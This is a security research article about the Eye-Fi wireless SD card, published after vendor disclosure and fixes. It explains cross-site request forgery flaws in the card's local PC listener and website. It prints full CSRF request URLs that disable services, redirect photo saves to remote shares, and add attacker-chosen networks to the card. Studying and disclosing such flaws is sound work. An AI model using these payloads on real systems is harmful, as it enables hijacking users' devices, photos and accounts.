Editor's Note: InformIT.com submitted this article to the Eye-Fi dev team prior to its posting to give them time to address the issues we uncovered. As a result, the Eye-Fi is now a much more secure solution. They have addressed (or will address shortly) all of the issues raised in this article, and have demonstrated their ability and desire to properly secure the Eye-Fi. As with any product, be sure to update your Eye-Fi software to the most recent version prior to usage.
We still feel this article is relevant from a vulnerability testing standpoint, as it demonstrates some of the security issues involved when dealing with technology that pushes the envelope of existing gadgetry. Even though you will no longer be able to exploit the issues we found with the Eye-Fi thanks to their rapid response, we feel you'll still be able to learn from our methodology and findings.
It is important to note, as the Eye-Fi dev team pointed out, some of the following issues are not security risks directly related to the Eye-Fi product. Ultimately it is up to the user to take responsibility for their actions and to use secure operating procedures. Again, the Eye-Fi is a superb product, and their professional and courteous response further proves this point. When it comes to security, it is a company's ability to understand, accept, and respond to software bugs that makes the difference — and we are convinced that the Eye-Fi team "gets" this important issue.
In Part 1 of this series, we took a look at the latest technology that provides a seamless and automated image transfer solution from a digital camera to a waiting PC seconds after the picture is taken. This product, known as the Eye-Fi, combines an SD card that hosts an embedded wireless card with a Web 2.0 web application to create an experience we found fascinating.
In this continuation of the Eye-Fi examination, we are going to look at this solution from the security researcher's perspective. Specifically, we are going to probe the device and its software counterparts for any bugs and/or security vulnerabilities that could be exploited by malicious hackers.
Web 2.0 and the Eye-Fi Versus CRSF
The Eye-Fi solution is—without a doubt—one of the most unique illustrations of Web 2.0 technology we have seen to date. It successfully wraps a complex application that connects to various sources of information to create a single point of administration for the Eye-Fi card, the Eye-Fi software running on the host PC, and the eye.fi web server. While the solution is eye-catching, its cutting edge programming was found to leave the user exposed to numerous attacks that could be exploited to the detriment of the Eye-Fi owner.
One of the major problems we found is that the listener on the host PC is vulnerable to cross-site request forgery attacks. As a result, it is trivial to send valid commands to the listener from a malicious website or a socially engineered URL click. In addition, thanks to the relationship between the Eye-Fi card and the Eye-Fi Manager, it is not only possible for an attacker to remotely configure the listener, but if the Eye-Fi is plugged into the USB reader, an attacker can also remotely configure the wireless card. Note that an attacker would have to know the MAC address of the card prior to most of these attacks. However, this is trivial to obtain with a sniffer.
The following will outline a few of the CSRF (cross-site request forgery) attacks we discovered against the PC listener:
- Enable/Disable Autostart—The following either enables or disables the auto-start on the Eye-Fi Manager. Note that this request will work on any Eye-Fi user.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetOptions&data=<?xml version=’1.0’ encoding=’utf-8’?><soap%3AEnvelope xmlns%3Asoap=’http%3A//schemas.xmlsoap.org/soap/envelope/’><soap%3ABody><SetOptions xmlns=’http%3A//localhost/api/soap/eyefilm-ui/v1’><LaunchOnStart>false</LaunchOnStart></SetOptions></soap%3ABody></soap%3AEnvelope>&key=&method=POST&url=/api/soap/eyefilm-ui/v1&dojo.preventCache=1199483783296&id=dojo.io.script.jsonp_dojoIoScript52._jsonpCallback
- Enable/Disable File Upload—The following disables the file upload service. While it is possible to enable the file upload service, any enable request must be done in combination with a call to the SetFolderConfig function, which is also vulnerable to a CSRF attack.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetDesktopSync&data=<?xml version=’1.0’ encoding=’utf-8’?><soap:Envelope xmlns:soap=’http://schemas.xmlsoap.org/soap/envelope/’><soap:Body><SetDesktopSync xmlns=’http://localhost/api/soap/eyefilm-ui/v1’><MacAddress>00-14-14-14-14-14</MacAddress><Enable>false</Enable></SetDesktopSync></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198255456000&id=dojo.io.script.jsonp_dojoIoScript72._jsonpCallback
- Change Location of File Download—The following URL updates the location where uploaded images are saved. This particular attack needs to be preceded by enabling synchronization using the previously discussed attack, and it will need to be repeated every three minutes for it to remain in effect. When the Eye-Fi Manager performs its polling, the settings.xml file is purged. By repeating the attack, the Eye-Fi Manager re-creates the content in the configuration file. While it is possible to change the destination location to another folder or drive on the victim PC, it is also possible to set the destination to a remote file share using a \\<ip address>\folder value. This is really bad!
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetFolderConfig&data=<?xml version=’1.0’ encoding=’utf-8’?><soap:Envelope xmlns:soap=’http://schemas.xmlsoap.org/soap/envelope/’><soap:Body><SetFolderConfig xmlns=’http://localhost/api/soap/eyefilm-ui/v1’><MacAddress>00-14-14-14-14-14</MacAddress><PhotoFolder>d:\Documents\My Pictures\Eye-Fi</PhotoFolder><AddDate>true</AddDate><DateType>1</DateType><UploadKey>869b06fcb45713bf406224363c8385b</UploadKey><DownsyncKey>ddcba29c41d5f1eae41b6af7944050bc</DownsyncKey></SetFolderConfig></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198255456046&id=dojo.io.script.jsonp_dojoIoScript73._jsonpCallback
The following is another serious CSRF attack against the Eye-Fi card, which will add any SSID (Service Set Identifier) value to the card. As a result, the card can be remotely programmed to connect to networks over which the user has no control. As a result, a malicious person can insert his own SSID into the camera and essentially hijack the image upload process.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3AAddNetwork& data=<?xml version=’1.0’ encoding=’utf-8’?><soap:Envelope xmlns:soap=’http://schemas.xmlsoap.org/soap/envelope/’><soap:Body><AddNetwork xmlns=’http://localhost/api/soap/eyefilm-ui/v1’><MacAddress>00-14-14-14-14-14</MacAddress><SSID>linksys</SSID><AuthType>0</AuthType><Key></Key></AddNetwork></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198261961187&id=dojo.io.script.jsonp_dojoIoScript91._jsonpCallback
In addition to the issues related to the Eye-Fi card and Manager, the Eye-Fi website is also vulnerable to CSRF attacks. The exploitation of these attacks could allow an attacker to configure additional photo sharing services, delete the account from the eye.fi site, or anything else that is not stored directly on the Eye-Fi card/host PC. For example, the following URL will reset the password of the victim's account. If a user visits a malicious site or clicks on a URL while logged into the Eye-Fi website, their account could be hijacked.